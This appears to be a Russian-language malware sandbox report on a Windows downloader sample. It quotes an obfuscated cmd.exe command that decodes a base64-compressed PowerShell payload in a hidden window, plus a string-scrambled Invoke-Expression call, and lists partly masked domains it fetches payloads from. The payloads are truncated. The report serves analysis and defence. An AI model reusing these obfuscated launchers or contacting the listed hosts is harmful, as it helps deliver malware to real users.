Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' cMD.EXE/c"sET yXu= (New-obJeCT Io.COMprESsiON.defLaTEstREaM( [sYstem.IO.MEMORYstreaM] [CONvert]::FROMBaSe64STrIng( 'NZBRT8IwFIX/yh6aFIJ0BjEGmiUoiMFERJboiy+37WVUunZu3SoS/ruwyOv5zv2Se8jLw3diMfS...
Сетевая активность
Подключается к
- 'ma###onda.com':80
- 'at###-lab.ru':80
- 'at###-lab.ru':443
- 'mi##ac.com':80
- 'bu###eddeal.com':80
TCP
Запросы HTTP GET
- http://ma###onda.com/PncwJNSS
- http://at###-lab.ru/iooP39igv
- http://mi##ac.com/CbVFJsO257
- http://www.bu###eddeal.com/dveNyRR42
Другие
- 'at###-lab.ru':443
UDP
- DNS ASK ma###onda.com
- DNS ASK at###-lab.ru
- DNS ASK mi##ac.com
- DNS ASK sp####rite.edu.pe
- DNS ASK bu###eddeal.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' cMD.EXE/c"sET yXu= (New-obJeCT Io.COMprESsiON.defLaTEstREaM( [sYstem.IO.MEMORYstreaM] [CONvert]::FROMBaSe64STrIng( 'NZBRT8IwFIX/yh6aFIJ0BjEGmiUoiMFERJboiy+37WVUunZu3SoS/ruwyOv5zv2Se8jLw3diMfS...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Sv ( 'h' + 'e87r' ) ( [tyPe](\"{2}{3}{1}{0}\"-f 't','rONmEN','env','I' ) ) ; .( \"{3}{2}{1}{0}\" -f 'SIon','-ExpreS','Ke','iNvO' ) ( ( ${He8`7r}::(\"{2}{3}{0}{1}\" -f 'OnMenTV'...
